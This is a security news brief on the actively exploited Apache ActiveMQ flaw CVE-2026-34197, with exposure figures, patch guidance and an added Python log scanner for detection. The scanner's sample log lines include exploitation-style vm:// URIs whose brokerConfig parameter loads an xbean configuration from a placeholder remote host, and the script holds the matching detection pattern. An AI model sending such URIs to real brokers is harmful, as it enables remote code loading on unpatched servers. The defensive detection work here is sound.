6,400 exposed Apache ActiveMQ servers still vulnerable to actively exploited CVE-2026-34197 - Shadowserver data shows Asia most impacted

Day-after follow-up to our April 18 coverage: Shadowserver has published telemetry showing that more than 6,400 internet-exposed Apache ActiveMQ servers are still vulnerable to CVE-2026-34197, the 13-year-old code injection flaw CISA added to KEV last week with an April 30 federal patch deadline. Geographic breakdown: Asia leads with 2,925 vulnerable servers, North America follows at 1,409, and Europe at 1,334. Horizon3's Naveen Sunkavally (who discovered the flaw using the Claude AI assistant as his research tool) is urging admins to treat this as a high priority, noting that ActiveMQ has been a repeated target for real-world attackers: CVE-2016-3088 and CVE-2023-46604 are both on KEV, and the latter was used as a zero-day by the TellYouThePass ransomware gang. The Apache maintainers patched the flaw on March 30 in ActiveMQ Classic 6.2.3 and 5.19.4. For retroactive detection, Horizon3 recommends searching broker logs for suspicious connections that use the internal VM transport protocol together with the brokerConfig=xbean:http:// query parameter, which is an indicator of exploitation.

Check
If you haven't patched ActiveMQ since March 30, check now. Shadowserver data shows thousands of exposed servers are still unpatched two weeks after the advisory.
Affected
Apache ActiveMQ Classic 5.x before 5.19.4, and 6.x from 6.0.0 up to (but not including) 6.2.3, where the Jolokia JMX-HTTP bridge is exposed through the web console at /api/jolokia/. Shadowserver counts 6,400+ internet-exposed vulnerable instances as of April 20.
Fix
Upgrade to ActiveMQ Classic 5.19.4 or 6.2.3. For retroactive detection, search broker logs for connections using the internal VM transport protocol combined with the brokerConfig=xbean:http:// parameter; this pattern indicates an exploitation attempt regardless of whether it succeeded. If the signature is found, treat the broker host as potentially compromised and rotate every credential that passed through it.
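As an added example (not Horizon3's or Apache's code), the following Python script applies the log check above to constructed sample lines, reporting any vm:// connection whose brokerConfig parameter loads an xbean configuration over the network. It goes slightly beyond the page by also catching percent-encoded and xbean:https:// variants of the same parameter; the log line layout and the form of the connection URI are assumptions made for the example.

```python
import re
import sys
from urllib.parse import parse_qs, unquote

# Constructed sample broker log lines for this example. The line layout and the
# way connection URIs appear are assumptions, not real ActiveMQ output; the
# 203.0.113.x addresses are documentation-range placeholders.
SAMPLE_LOG = """\
2026-04-19 10:01:02,118 INFO  Connector vm://localhost started
2026-04-19 10:02:17,455 INFO  Connection from vm://localhost?brokerConfig=xbean:http://203.0.113.5/broker.xml
2026-04-19 10:03:44,001 INFO  Connection from vm://localhost?brokerConfig=xbean%3Ahttp%3A%2F%2F203.0.113.5%2Fb.xml
2026-04-19 10:05:00,770 INFO  Connection from vm://localhost?brokerConfig=xbean:file:conf/activemq.xml
2026-04-19 10:06:12,300 INFO  Connection from tcp://198.51.100.7:61616
"""

# Any vm:// URI up to the next whitespace; the query string is captured with it.
VM_URI = re.compile(r"vm://\S+")

def suspicious_uris(line: str) -> list[str]:
    """Return vm:// URIs on this line whose brokerConfig loads an xbean config
    over http(s). Local xbean:file: configs are normal and are not reported."""
    hits = []
    for uri in VM_URI.findall(line):
        _, _, query = uri.partition("?")
        # parse_qs percent-decodes once; parameter names are compared case-insensitively.
        params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
        for value in params.get("brokerconfig", []):
            value = unquote(value).lower()  # tolerate a second layer of encoding
            if value.startswith(("xbean:http://", "xbean:https://")):
                hits.append(uri)
                break
    return hits

def scan_log(text: str) -> list[tuple[int, str]]:
    """Scan a whole log and return (line number, offending URI) pairs."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for uri in suspicious_uris(line):
            findings.append((lineno, uri))
    return findings

if __name__ == "__main__":
    # Usage: python scan.py [activemq.log]; without an argument the sample is scanned.
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_LOG
    for lineno, uri in scan_log(text):
        print(f"line {lineno}: possible CVE-2026-34197 exploitation attempt: {uri}")
```

A hit is an attempt, not proof of success; follow the page's advice and treat the host as potentially compromised while you investigate.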